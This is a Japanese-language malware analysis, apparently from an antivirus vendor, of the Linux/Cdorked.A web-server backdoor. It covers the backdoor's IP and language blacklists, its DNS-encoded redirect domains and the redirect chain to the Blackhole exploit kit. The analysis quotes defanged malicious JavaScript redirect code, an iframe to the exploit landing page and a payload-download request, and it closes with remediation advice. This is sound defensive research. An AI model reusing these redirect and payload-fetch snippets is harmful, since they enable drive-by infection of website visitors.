Linux / Cdorked.A：Lighttpdとnginxを実行しているWebサーバーが危険にさらされています

調査の最後の部分では、 Linux / Cdorked.Aバックドアに関連するLinuxサーバー感染インシデントの分析の続きを公開することを約束しました。 私たちはすでに、研究室の専門家が、Webサーバーユーザーを悪意のあるWebサイトにリダイレクトするという主なタスクをインストールしたことを書きました。 この事件を詳細に調査した結果、次の結論に達しました。

• 合計で、Linux / Cdorked.Aに感染した400以上のWebサーバーが検出されました。 さらに、それらの50が、Alexaのトップ100,000の最も人気のあるWebサイトに含まれるWebサイトをホストしています。
• バックドアは、Apacheを実行するだけでなく、Lighttpd、nginxを実行するWebサーバーを侵害しました。
• 弊社のテレメトリシステムによると、この脅威は2012年12月から活発です。
• バックドアは、追加のメカニズムを使用して、機密性を確保します。 特に、クライアントのIPアドレスがブラックリストに示されているアドレスの範囲内にある場合、悪意のあるコードはユーザーをリダイレクトしません。 このブラックリストは非常に大きく、日本、フィンランド、ロシア、ウクライナ、カザフスタン、ベラルーシなどの国に属するアドレスが含まれています。 さらに、HTTPヘッダーとAccept-Languageパラメーターを分析することにより、国のチェックも実行されます。
• 当社のクラウドテクノロジーは、侵害されたWebサーバーによって生成されたリンクにリダイレクトされるESET AV製品のほぼ100,000人のユーザーを示しています。 同時に、このような悪意のあるコンテンツへのリダイレクトは、ウイルス対策によってブロックされました。
• 場合によっては、Apple iPadおよびiPhoneプラットフォームの特別なリダイレクトが確認されました。

この投稿では、分析中に特定されたこのバックドアの機能について詳しく説明し、ユーザーに配信される悪意のあるコンテンツと、ユーザーを一連のエクスプロイトにリダイレクトする組織について詳しく説明します。



バックドアがどのようにサーバーに到達したのかは確かではないことに注意してください。 おそらく、この攻撃のベクトルは一意ではありませんでした。 同時に、侵害されたサーバーのすべてが制御下にあるわけではないため、cPanel構成ギャップがインストールに使用されたとは言えません。 バックドアには自己配布メカニズムがなく、インストールにサーバー上のソフトウェアの脆弱性を使用しません。



次のスクリーンショットは、サーバーへのリモートアクセスが開かれるバックドアコード内の場所を示しています。 正当なLighttpd、nginx、およびApacheファイルを置き換えるさまざまなタイプのバイナリファイル。





Lighttpd





nginx





アパッチ



バックドアコードは3つすべてのケースで同一に見えますが、一部の関数内で使用されるフックは、選択されたサーバーとそのデータ構造に依存するため、異なります。



バックドア機能



バックドアでサポートされているコマンドについては既に説明しました。 この分析では、それらについてさらに詳しく説明します。







これらのリストは、分析ツールを使用してアクセスできる共有メモリ領域に保存されます。 表にリストされている設定は、攻撃のターゲットを選択するときに、攻撃者が悪意のあるコードを微調整する絶好の機会を実際に提供します。 Linux / Cdorked.Aは、リダイレクトされたクライアントのIPアドレスのリストを保持し、リダイレクト時間を示します。 これにより、指定された期間のリダイレクトが回避されます。 これらの設定はいずれもディスク上のファイルに保存されず、バックドアによって処理される特別なHTTPリクエストによって変更されます。



典型的なバックドア構成



Sucuriの専門家だけでなく、Webサーバーの侵害事件の調査に参加したシステム管理者の助けを借りて、Linux / Cdorked.Aが構成情報を保存するメモリ領域のダンプを取得することができました。 これらのダンプの1つの例：







これまでのところ、クライアントのリダイレクトに使用される複数のURLを含む単一のLinux / Cdorked.A構成を取得することはできませんでした。 指定されたリダイレクトは、Windows XP、Vista、SevenのブラウザーInternet ExplorerまたはFirefoxで動作するサーバーにリクエストを行うクライアントに適用されます。 Apple iPhoneとiPadのユーザーも狙っていましたが、エクスプロイトセットにリダイレクトする代わりに、ポルノサイトへのリンクを含むWebページにリダイレクトするという戦術を使用していました。 次のスクリーンショットは、iPhoneでのリダイレクトを示しています。







Linux / Cdorked.Aの構成には、広範なIPアドレス範囲のブラックリストが含まれていることは既に述べました。 これらのアドレスのいずれかから侵害されたWebサーバーへの訪問者は、悪意のあるコンテンツにリダイレクトされることはありません。 実際、私たちが観察したバックドア構成では、考えられるすべてのIP v4スペースアドレスの50％を表すIPアドレスの数がブロックされました。 また、ブラウザのHTTPヘッダーのAccept-Languageフィールドで設定された言語がブラックリストに登録されている場合、クライアントはリダイレクトされません。 リストには言語が含まれます。

• ja、jp-日本語;
• fiはフィンランド語です。
• ru-ロシア語;
• uk-ウクライナ語;
• be-ベラルーシ語;
• kk-カザフ;

実際、サイバー犯罪者はバックドアの地理的範囲を意図的に制限しました。これは、ユーザーの制御されない感染が、既に侵害されたサーバーのメンテナンスと不必要な疑いの賦課に悪影響を及ぼす可能性があるためです。



リダイレクト統計



実際、これらの悪意のあるリダイレクトには共通点があります。Blackholeの場合、クライアントをリダイレクトすると、URLパターンの「/ info / last」の部分が示されます。 追跡した悪意のあるアクティビティの最初のトレースでは、「/ info / last」部分が示されているテンプレートを使用します。これについては、後で説明する同一のDNSテンプレートを使用します。



トラフィックを分析した結果、Linux / Cdorked.Aのアクティビティの影響を受ける400以上のWebサーバーを発見しました。 同時に、そのうち50のWebサイトは、Alexa TOP 100,000の最も人気のあるWebサイトに含まれています。 分析の最初の部分が公開された後、これらのサーバーの所有者の一部は、この脅威からサーバーを削除しました。







Linux / Cdorked.Aは、各IPアドレスの最後のリダイレクトのタイムスタンプをサポートしています。 1つのサーバーが1日にできるリダイレクトの数を推定するために、メモリダンプからこの情報を抽出することができました。 これらのダンプの1つには、サーバーに関する情報が含まれており、24時間で28,000を超えるリダイレクトが実行されました。 このようなサーバーは常にアクティブではありません。いくつかのサーバーのリダイレクト統計を以下に示します。











DNSハイジャック



バックドアがリダイレクトに使用するURLはしばしば変更されます。 ただし、いくつかのパターンがあります。

• 通常、ドメインへのパスは次のとおりです：[数字、a、b、またはc] [文字]。[Tld]。
• 次のレベルのドメインは、常に16進数の16文字です。

サブドメインの特定の形式と、サブドメインが絶えず変化しているという事実から、一部のDNSサーバーが侵害されたと考える理由が得られます。 サブドメインの文字を変更するいくつかのテストを実施し、場合によっては変換中にIPアドレスの変更を受け取りました。 他のいくつかのテストでは、DNSサービスを介して返されたIPアドレスがサブドメイン自体の名前で実際にエンコードされているという事実を確認することができました。 このために、奇数位置の文字が使用され、4バイトの16進文字列を形成し、IPアドレスを取得するために使用されます。 XORアルゴリズムは、IPアドレスを生成するために使用されます。







このために、アルゴリズムが使用されます。



byte[] = { 16, 70, 183, 11 } // From the hex string

seed = 49 // This seed changes, we have not yet found where it comes for

ip[0] = seed ^ byte[0] // 33

ip[1] = byte[0] ^ byte[1] // 86

ip[2] = byte[1] ^ byte[2] // 241

ip[3] = byte[2] ^ byte[3] // 188

// This gives us a response with IP 188.241.86.33







リダイレクトチェーン



クライアントが悪意のあるコンテンツにリダイレクトされると、Blackholeエクスプロイトスイートページに直接アクセスする前に、いくつかの特別なWebページを通過します。 次のスクリーンショットは、このようなチェーンの例を示しています。







最初のページ/index.phpには、base64を使用して暗号化され、前の記事で説明したパラメーターが含まれています。 デコード後、次のようになります。



ljroujxv = isiuzv＆time = 1305022208-2007115935＆src = 141＆surl = somedomain.com＆sport = 80＆key = ED143377＆suri = / tr / zeki.htm



このページには、ユーザーを次のページにリダイレクトするJavaScriptが含まれています。



var iflag = "0"; if (top!=self) { iflag = "1"; };

var b64str = "MTQxNDExMzA1MDIyMjQ4M...luLmNvbS9zb3J0LnBocA==";

setTimeout ( function() { location.replace( "hxxp://ae334b05c4249f38" + iflag

+ b64dec(b64str) ); }, 280);









2番目のページのURLは、初期サブドメイン、iflagパラメーターの値、およびサーバーによって生成されたb64str変数の値の3つの部分で構成されています。 現在のドキュメントがブラウザウィンドウのフォアグラウンドにある場合、Iflagは1に設定されます。 この場合、サーバーはおそらくリクエストを拒否します。 b64str変数の値はサーバーによって提供され、サブドメインの非常に長い部分を持つURLが含まれます。



1414113050222483098587bcf02fc1731aade45f74550b.somedomain.com/sort.php



URLの3番目の部分には、開始URLおよびタイムスタンプ-タイムスタンプから取得したソースID-src idなど、このリダイレクトに関する特定の情報が含まれています。 残りのキャラクターの目的は不明のままです。







3番目のページであるsort.phpは、特定のタイムアウト後、ユーザーを4番目のページであるexit.phpに誘導します。 典型的なsort.phpページは次のとおりです。



function gotime() { xflag=false; top.location.replace(b64dec("aHR0cDovL2FlMzM0YjA1YzQyNDlmM...

...cD94PTEzNyZ0PXRpbWVvdXQ=")); };

var timer=setTimeout("gotime()", 21000);

var ewq;

ewq=document.createElement("span");

ewq.innerHTML=b64dec("PGlmcmFtZSBzcmM9Im...1lPjxicj4=");

setTimeout(function() { document.body.insertBefore(ewq,document.body.lastChild); }, 504);

aHr...XQ= : hxxp://ae334b05c4249f38014141130...

...50222483098587bcf02fc1731aade45f74550b.somedomain.com/exit.php?x=137&t=timeout







この4ページ目には、ポルノ画像が表示され、ポルノサイトへのリンクが提供されます。 このページには、Blackholeページにつながるiframeも含まれています。 ポルノコンテンツへのリンクが悪意のあるものであるか、アフィリエイトプログラムの一部であるかはまだ明確ではありません。 以下は、Blackholeのランディングページにつながるiframeです。



PGI...j4= : <iframe src="hxxp://ae334b05c4249f38014141130502224830...

...98587bcf02fc1731aade45f74550b.somedomain.com/info/last/index.php"

width="120" height="21" marginwidth="0" marginheight="0" frameborder="0"

scrolling="no" allowtransparency="true">



PGI...j4= : <iframe src="hxxp://ae334b05c4249f38014141130502224830...

...98587bcf02fc1731aade45f74550b.somedomain.com/info/last/index.php"

width="120" height="21" marginwidth="0" marginheight="0" frameborder="0"

scrolling="no" allowtransparency="true">



<br>



最後のステップは、エクスプロイトのいずれかが成功した場合、被害者のコンピューターにマルウェアをダウンロードすることです。



GET /get3.php?e=176541242&tc=1305022250-072800c977&uid=536201305032119591656771 HTTP / 1.0

ホスト：ae334b05c4249f38.somedomain.com

ユーザーエージェント：NSISDL / 1.2（Mozilla）

受け入れる：* / *



テストとテレメトリデータは、 Win32 / Glupteba.Gトロイの木馬がユーザーのコンピューターにインストールされたことを示しています。



回復



以前の投稿で、システム管理者がサーバーに保存されているメインバイナリファイルの整合性をチェックすることを既にお勧めしました。 また、Linux / Cdorked.A構成を保存するメモリ領域をダンプするdump_cdorked_configツールを公開しました。 このツールは、nginxおよびLighttpdのバージョンを含むすべてのバックドアオプションを検出するように更新されました。



ネットワークユーザーの場合、ブラウザ、その拡張機能、OS、およびJava、Adobe Reader、Flash Playerなどの重要なソフトウェアをタイムリーに更新することをお勧めします。 ウイルス対策ソフトウェアを使用することもお勧めします。